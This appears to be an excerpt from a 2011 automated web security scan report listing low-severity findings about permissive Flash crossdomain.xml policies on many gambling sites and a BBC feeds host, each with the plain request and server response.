HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:32:20 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 908 <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*.scratch2cash.com" /> <allow-access-from domain="*.hopa.com" /> <allow-access-from domain="*.neogames-tech.com" /> <allow-access-from domain="*.wingrattage.com" /> <allow-access-from domain="*.winnings.com" /> <allow-access-from domain="*.crazyscratch.com" /> <allow-access-from domain="*.luckyacefeeds.com" /> <allow-access-from domain="*.netticasino.com" /> <allow-access-from domain="*.slotsandgames.com" /> <allow-access-from domain="*.topscratch.com" /> <allow-access-from domain="*.extraspel.com" /> <allow-access-from domain="*.primewinners.com" /> <allow-access-from domain="*.superfortuna.it" /> <allow-access-from domain="*.cdnfo.com" /> <allow-access-from domain="*.postcodelottery.com" /> <allow-access-from domain="*.mrspil.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://en.bigmoneyscratch |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: en.bigmoneyscratch.com |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:02:25 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 909 <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*.scratch2cash.com" /> <allow-access-from domain="*.hopa.com" /> <allow-access-from domain="*.neogames-tech.com" /> <allow-access-from domain="*.wingrattage.com" /> <allow-access-from domain="*.winnings.com" /> <allow-access-from domain="*.crazyscratch.com" /> <allow-access-from domain="*.luckyacefeeds.com" /> <allow-access-from domain="*.netticasino.com" /> <allow-access-from domain="*.slotsandgames.com" /> <allow-access-from domain="*.topscratch.com" /> <allow-access-from domain="*.extraspel.com" /> <allow-access-from domain="*.primewinners.com" /> <allow-access-from domain="*.superfortuna.it" /> <allow-access-from domain="*.cdnfo.com" /> <allow-access-from domain="*.postcodelottery.com" /> <allow-access-from domain="*.mrspil.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://en.crazyscratch |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: en.crazyscratch.com |
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Fri, 21 Jan 2011 08:47:43 GMT Accept-Ranges: bytes ETag: "a2051de47b9cb1:0" Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 12:44:29 GMT Connection: close Content-Length: 280 <?xml version="1.0" encoding="utf-8" ?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <allow-access-from domain="crazyscratch.com" /> <allow-access-from domain="*.crazyscratch.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://en.info.winnings |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: en.info.winnings.com |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:24:18 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 909 <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*.scratch2cash.com" /> <allow-access-from domain="*.hopa.com" /> <allow-access-from domain="*.neogames-tech.com" /> <allow-access-from domain="*.wingrattage.com" /> <allow-access-from domain="*.winnings.com" /> <allow-access-from domain="*.crazyscratch.com" /> <allow-access-from domain="*.luckyacefeeds.com" /> <allow-access-from domain="*.netticasino.com" /> <allow-access-from domain="*.slotsandgames.com" /> <allow-access-from domain="*.topscratch.com" /> <allow-access-from domain="*.extraspel.com" /> <allow-access-from domain="*.primewinners.com" /> <allow-access-from domain="*.superfortuna.it" /> <allow-access-from domain="*.cdnfo.com" /> <allow-access-from domain="*.postcodelottery.com" /> <allow-access-from domain="*.mrspil.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://en.karamba.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: en.karamba.com |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:35:48 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 909 <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*.scratch2cash.com" /> <allow-access-from domain="*.hopa.com" /> <allow-access-from domain="*.neogames-tech.com" /> <allow-access-from domain="*.wingrattage.com" /> <allow-access-from domain="*.winnings.com" /> <allow-access-from domain="*.crazyscratch.com" /> <allow-access-from domain="*.luckyacefeeds.com" /> <allow-access-from domain="*.netticasino.com" /> <allow-access-from domain="*.slotsandgames.com" /> <allow-access-from domain="*.topscratch.com" /> <allow-access-from domain="*.extraspel.com" /> <allow-access-from domain="*.primewinners.com" /> <allow-access-from domain="*.superfortuna.it" /> <allow-access-from domain="*.cdnfo.com" /> <allow-access-from domain="*.postcodelottery.com" /> <allow-access-from domain="*.mrspil.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://en.scratch2cash |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: en.scratch2cash.com |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:25:16 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 909 <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*.scratch2cash.com" /> <allow-access-from domain="*.hopa.com" /> <allow-access-from domain="*.neogames-tech.com" /> <allow-access-from domain="*.wingrattage.com" /> <allow-access-from domain="*.winnings.com" /> <allow-access-from domain="*.crazyscratch.com" /> <allow-access-from domain="*.luckyacefeeds.com" /> <allow-access-from domain="*.netticasino.com" /> <allow-access-from domain="*.slotsandgames.com" /> <allow-access-from domain="*.topscratch.com" /> <allow-access-from domain="*.extraspel.com" /> <allow-access-from domain="*.primewinners.com" /> <allow-access-from domain="*.superfortuna.it" /> <allow-access-from domain="*.cdnfo.com" /> <allow-access-from domain="*.postcodelottery.com" /> <allow-access-from domain="*.mrspil.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://en.scratchcar |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: en.scratchcardheaven.com |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:31:43 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 909 <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*.scratch2cash.com" /> <allow-access-from domain="*.hopa.com" /> <allow-access-from domain="*.neogames-tech.com" /> <allow-access-from domain="*.wingrattage.com" /> <allow-access-from domain="*.winnings.com" /> <allow-access-from domain="*.crazyscratch.com" /> <allow-access-from domain="*.luckyacefeeds.com" /> <allow-access-from domain="*.netticasino.com" /> <allow-access-from domain="*.slotsandgames.com" /> <allow-access-from domain="*.topscratch.com" /> <allow-access-from domain="*.extraspel.com" /> <allow-access-from domain="*.primewinners.com" /> <allow-access-from domain="*.superfortuna.it" /> <allow-access-from domain="*.cdnfo.com" /> <allow-access-from domain="*.postcodelottery.com" /> <allow-access-from domain="*.mrspil.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://es.bigmoneyscratch |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: es.bigmoneyscratch.com |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:12:32 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 909 <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*.scratch2cash.com" /> <allow-access-from domain="*.hopa.com" /> <allow-access-from domain="*.neogames-tech.com" /> <allow-access-from domain="*.wingrattage.com" /> <allow-access-from domain="*.winnings.com" /> <allow-access-from domain="*.crazyscratch.com" /> <allow-access-from domain="*.luckyacefeeds.com" /> <allow-access-from domain="*.netticasino.com" /> <allow-access-from domain="*.slotsandgames.com" /> <allow-access-from domain="*.topscratch.com" /> <allow-access-from domain="*.extraspel.com" /> <allow-access-from domain="*.primewinners.com" /> <allow-access-from domain="*.superfortuna.it" /> <allow-access-from domain="*.cdnfo.com" /> <allow-access-from domain="*.postcodelottery.com" /> <allow-access-from domain="*.mrspil.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://es.crazyscratch |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: es.crazyscratch.com |
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Fri, 21 Jan 2011 08:47:51 GMT Accept-Ranges: bytes ETag: "e8d30e347b9cb1:0" Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 12:35:36 GMT Connection: close Content-Length: 280 <?xml version="1.0" encoding="utf-8" ?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <allow-access-from domain="crazyscratch.com" /> <allow-access-from domain="*.crazyscratch.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://es.karamba.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: es.karamba.com |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:10:20 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 908 <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*.scratch2cash.com" /> <allow-access-from domain="*.hopa.com" /> <allow-access-from domain="*.neogames-tech.com" /> <allow-access-from domain="*.wingrattage.com" /> <allow-access-from domain="*.winnings.com" /> <allow-access-from domain="*.crazyscratch.com" /> <allow-access-from domain="*.luckyacefeeds.com" /> <allow-access-from domain="*.netticasino.com" /> <allow-access-from domain="*.slotsandgames.com" /> <allow-access-from domain="*.topscratch.com" /> <allow-access-from domain="*.extraspel.com" /> <allow-access-from domain="*.primewinners.com" /> <allow-access-from domain="*.superfortuna.it" /> <allow-access-from domain="*.cdnfo.com" /> <allow-access-from domain="*.postcodelottery.com" /> <allow-access-from domain="*.mrspil.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://es.scratch2cash |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: es.scratch2cash.com |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:20:46 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 908 <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*.scratch2cash.com" /> <allow-access-from domain="*.hopa.com" /> <allow-access-from domain="*.neogames-tech.com" /> <allow-access-from domain="*.wingrattage.com" /> <allow-access-from domain="*.winnings.com" /> <allow-access-from domain="*.crazyscratch.com" /> <allow-access-from domain="*.luckyacefeeds.com" /> <allow-access-from domain="*.netticasino.com" /> <allow-access-from domain="*.slotsandgames.com" /> <allow-access-from domain="*.topscratch.com" /> <allow-access-from domain="*.extraspel.com" /> <allow-access-from domain="*.primewinners.com" /> <allow-access-from domain="*.superfortuna.it" /> <allow-access-from domain="*.cdnfo.com" /> <allow-access-from domain="*.postcodelottery.com" /> <allow-access-from domain="*.mrspil.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://es.scratchcar |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: es.scratchcardheaven.com |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:35:01 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 908 <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*.scratch2cash.com" /> <allow-access-from domain="*.hopa.com" /> <allow-access-from domain="*.neogames-tech.com" /> <allow-access-from domain="*.wingrattage.com" /> <allow-access-from domain="*.winnings.com" /> <allow-access-from domain="*.crazyscratch.com" /> <allow-access-from domain="*.luckyacefeeds.com" /> <allow-access-from domain="*.netticasino.com" /> <allow-access-from domain="*.slotsandgames.com" /> <allow-access-from domain="*.topscratch.com" /> <allow-access-from domain="*.extraspel.com" /> <allow-access-from domain="*.primewinners.com" /> <allow-access-from domain="*.superfortuna.it" /> <allow-access-from domain="*.cdnfo.com" /> <allow-access-from domain="*.postcodelottery.com" /> <allow-access-from domain="*.mrspil.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://feeds.bbci.co.uk |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: feeds.bbci.co.uk |
HTTP/1.0 200 OK Server: Apache Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT Content-Type: text/xml Cache-Control: max-age=118 Expires: Mon, 16 May 2011 12:47:26 GMT Date: Mon, 16 May 2011 12:45:28 GMT Content-Length: 1081 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="downloads.bbc.co.uk" /> <allow-access-from domain="www.bbcamerica.com" /> <allow-access-from domain="*.bbcamerica.com" /> <allow-access-from domain="www.bbc.co.uk" /> <allow-access-from domain="news.bbc.co.uk" /> <allow-access-from domain="newsimg.bbc.co.uk"/> <allow-access-from domain="nolpreview11.newsonline <allow-access-from domain="newsrss.bbc.co.uk" /> <allow-access-from domain="newsapi.bbc.co.uk" /> <allow-access-from domain="extdev.bbc.co.uk" /> <allow-access-from domain="stats.bbc.co.uk" /> <allow-access-from domain="*.bbc.co.uk"/> <allow-access-from domain="*.bbci.co.uk"/> <allow-access-from domain="*.bbc.com"/> ...[SNIP]... <allow-access-from domain="jam.bbc.co.uk" /> <allow-access-from domain="dc01.dc.bbc.co.uk" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://fi.bigmoneyscratch |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: fi.bigmoneyscratch.com |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:20:17 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 908 <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*.scratch2cash.com" /> <allow-access-from domain="*.hopa.com" /> <allow-access-from domain="*.neogames-tech.com" /> <allow-access-from domain="*.wingrattage.com" /> <allow-access-from domain="*.winnings.com" /> <allow-access-from domain="*.crazyscratch.com" /> <allow-access-from domain="*.luckyacefeeds.com" /> <allow-access-from domain="*.netticasino.com" /> <allow-access-from domain="*.slotsandgames.com" /> <allow-access-from domain="*.topscratch.com" /> <allow-access-from domain="*.extraspel.com" /> <allow-access-from domain="*.primewinners.com" /> <allow-access-from domain="*.superfortuna.it" /> <allow-access-from domain="*.cdnfo.com" /> <allow-access-from domain="*.postcodelottery.com" /> <allow-access-from domain="*.mrspil.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://fi.crazyscratch |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: fi.crazyscratch.com |
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Fri, 21 Jan 2011 08:47:58 GMT Accept-Ranges: bytes ETag: "249f90e747b9cb1:0" Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 12:32:06 GMT Connection: close Content-Length: 280 <?xml version="1.0" encoding="utf-8" ?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <allow-access-from domain="crazyscratch.com" /> <allow-access-from domain="*.crazyscratch.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://fi.karamba.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: fi.karamba.com |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:45:19 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 909 <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*.scratch2cash.com" /> <allow-access-from domain="*.hopa.com" /> <allow-access-from domain="*.neogames-tech.com" /> <allow-access-from domain="*.wingrattage.com" /> <allow-access-from domain="*.winnings.com" /> <allow-access-from domain="*.crazyscratch.com" /> <allow-access-from domain="*.luckyacefeeds.com" /> <allow-access-from domain="*.netticasino.com" /> <allow-access-from domain="*.slotsandgames.com" /> <allow-access-from domain="*.topscratch.com" /> <allow-access-from domain="*.extraspel.com" /> <allow-access-from domain="*.primewinners.com" /> <allow-access-from domain="*.superfortuna.it" /> <allow-access-from domain="*.cdnfo.com" /> <allow-access-from domain="*.postcodelottery.com" /> <allow-access-from domain="*.mrspil.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://fi.scratchcar |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: fi.scratchcardheaven.com |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:24:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 909 <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*.scratch2cash.com" /> <allow-access-from domain="*.hopa.com" /> <allow-access-from domain="*.neogames-tech.com" /> <allow-access-from domain="*.wingrattage.com" /> <allow-access-from domain="*.winnings.com" /> <allow-access-from domain="*.crazyscratch.com" /> <allow-access-from domain="*.luckyacefeeds.com" /> <allow-access-from domain="*.netticasino.com" /> <allow-access-from domain="*.slotsandgames.com" /> <allow-access-from domain="*.topscratch.com" /> <allow-access-from domain="*.extraspel.com" /> <allow-access-from domain="*.primewinners.com" /> <allow-access-from domain="*.superfortuna.it" /> <allow-access-from domain="*.cdnfo.com" /> <allow-access-from domain="*.postcodelottery.com" /> <allow-access-from domain="*.mrspil.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://fr.bigmoneyscratch |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: fr.bigmoneyscratch.com |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:32:13 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 908 <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*.scratch2cash.com" /> <allow-access-from domain="*.hopa.com" /> <allow-access-from domain="*.neogames-tech.com" /> <allow-access-from domain="*.wingrattage.com" /> <allow-access-from domain="*.winnings.com" /> <allow-access-from domain="*.crazyscratch.com" /> <allow-access-from domain="*.luckyacefeeds.com" /> <allow-access-from domain="*.netticasino.com" /> <allow-access-from domain="*.slotsandgames.com" /> <allow-access-from domain="*.topscratch.com" /> <allow-access-from domain="*.extraspel.com" /> <allow-access-from domain="*.primewinners.com" /> <allow-access-from domain="*.superfortuna.it" /> <allow-access-from domain="*.cdnfo.com" /> <allow-access-from domain="*.postcodelottery.com" /> <allow-access-from domain="*.mrspil.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://fr.crazyscratch |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: fr.crazyscratch.com |
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Fri, 21 Jan 2011 08:48:06 GMT Accept-Ranges: bytes ETag: "30434ec47b9cb1:0" Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 12:25:16 GMT Connection: close Content-Length: 280 <?xml version="1.0" encoding="utf-8" ?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <allow-access-from domain="crazyscratch.com" /> <allow-access-from domain="*.crazyscratch.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://fr.karamba.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: fr.karamba.com |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:11:05 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 908 <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*.scratch2cash.com" /> <allow-access-from domain="*.hopa.com" /> <allow-access-from domain="*.neogames-tech.com" /> <allow-access-from domain="*.wingrattage.com" /> <allow-access-from domain="*.winnings.com" /> <allow-access-from domain="*.crazyscratch.com" /> <allow-access-from domain="*.luckyacefeeds.com" /> <allow-access-from domain="*.netticasino.com" /> <allow-access-from domain="*.slotsandgames.com" /> <allow-access-from domain="*.topscratch.com" /> <allow-access-from domain="*.extraspel.com" /> <allow-access-from domain="*.primewinners.com" /> <allow-access-from domain="*.superfortuna.it" /> <allow-access-from domain="*.cdnfo.com" /> <allow-access-from domain="*.postcodelottery.com" /> <allow-access-from domain="*.mrspil.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://fr.scratch2cash |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: fr.scratch2cash.com |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:30:43 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 908 <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*.scratch2cash.com" /> <allow-access-from domain="*.hopa.com" /> <allow-access-from domain="*.neogames-tech.com" /> <allow-access-from domain="*.wingrattage.com" /> <allow-access-from domain="*.winnings.com" /> <allow-access-from domain="*.crazyscratch.com" /> <allow-access-from domain="*.luckyacefeeds.com" /> <allow-access-from domain="*.netticasino.com" /> <allow-access-from domain="*.slotsandgames.com" /> <allow-access-from domain="*.topscratch.com" /> <allow-access-from domain="*.extraspel.com" /> <allow-access-from domain="*.primewinners.com" /> <allow-access-from domain="*.superfortuna.it" /> <allow-access-from domain="*.cdnfo.com" /> <allow-access-from domain="*.postcodelottery.com" /> <allow-access-from domain="*.mrspil.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://fr.scratchcar |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: fr.scratchcardheaven.com |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:32:16 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 909 <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*.scratch2cash.com" /> <allow-access-from domain="*.hopa.com" /> <allow-access-from domain="*.neogames-tech.com" /> <allow-access-from domain="*.wingrattage.com" /> <allow-access-from domain="*.winnings.com" /> <allow-access-from domain="*.crazyscratch.com" /> <allow-access-from domain="*.luckyacefeeds.com" /> <allow-access-from domain="*.netticasino.com" /> <allow-access-from domain="*.slotsandgames.com" /> <allow-access-from domain="*.topscratch.com" /> <allow-access-from domain="*.extraspel.com" /> <allow-access-from domain="*.primewinners.com" /> <allow-access-from domain="*.superfortuna.it" /> <allow-access-from domain="*.cdnfo.com" /> <allow-access-from domain="*.postcodelottery.com" /> <allow-access-from domain="*.mrspil.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://home.okscratc |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: home.okscratchcards.com |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 11:41:05 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 909 <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*.scratch2cash.com" /> <allow-access-from domain="*.hopa.com" /> <allow-access-from domain="*.neogames-tech.com" /> <allow-access-from domain="*.wingrattage.com" /> <allow-access-from domain="*.winnings.com" /> <allow-access-from domain="*.crazyscratch.com" /> <allow-access-from domain="*.luckyacefeeds.com" /> <allow-access-from domain="*.netticasino.com" /> <allow-access-from domain="*.slotsandgames.com" /> <allow-access-from domain="*.topscratch.com" /> <allow-access-from domain="*.extraspel.com" /> <allow-access-from domain="*.primewinners.com" /> <allow-access-from domain="*.superfortuna.it" /> <allow-access-from domain="*.cdnfo.com" /> <allow-access-from domain="*.postcodelottery.com" /> <allow-access-from domain="*.mrspil.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://hu.crazyscratch |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: hu.crazyscratch.com |
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Tue, 21 Sep 2010 08:44:53 GMT Accept-Ranges: bytes ETag: "82c9a426959cb1:0" Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 12:45:18 GMT Connection: close Content-Length: 280 <?xml version="1.0" encoding="utf-8" ?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <allow-access-from domain="crazyscratch.com" /> <allow-access-from domain="*.crazyscratch.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://it.bigmoneyscratch |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: it.bigmoneyscratch.com |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:02:28 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 908 <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*.scratch2cash.com" /> <allow-access-from domain="*.hopa.com" /> <allow-access-from domain="*.neogames-tech.com" /> <allow-access-from domain="*.wingrattage.com" /> <allow-access-from domain="*.winnings.com" /> <allow-access-from domain="*.crazyscratch.com" /> <allow-access-from domain="*.luckyacefeeds.com" /> <allow-access-from domain="*.netticasino.com" /> <allow-access-from domain="*.slotsandgames.com" /> <allow-access-from domain="*.topscratch.com" /> <allow-access-from domain="*.extraspel.com" /> <allow-access-from domain="*.primewinners.com" /> <allow-access-from domain="*.superfortuna.it" /> <allow-access-from domain="*.cdnfo.com" /> <allow-access-from domain="*.postcodelottery.com" /> <allow-access-from domain="*.mrspil.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://it.crazyscratch |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: it.crazyscratch.com |
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Fri, 21 Jan 2011 08:48:14 GMT Accept-Ranges: bytes ETag: "d01ceff047b9cb1:0" Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 12:32:28 GMT Connection: close Content-Length: 280 <?xml version="1.0" encoding="utf-8" ?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <allow-access-from domain="crazyscratch.com" /> <allow-access-from domain="*.crazyscratch.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://it.karamba.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: it.karamba.com |
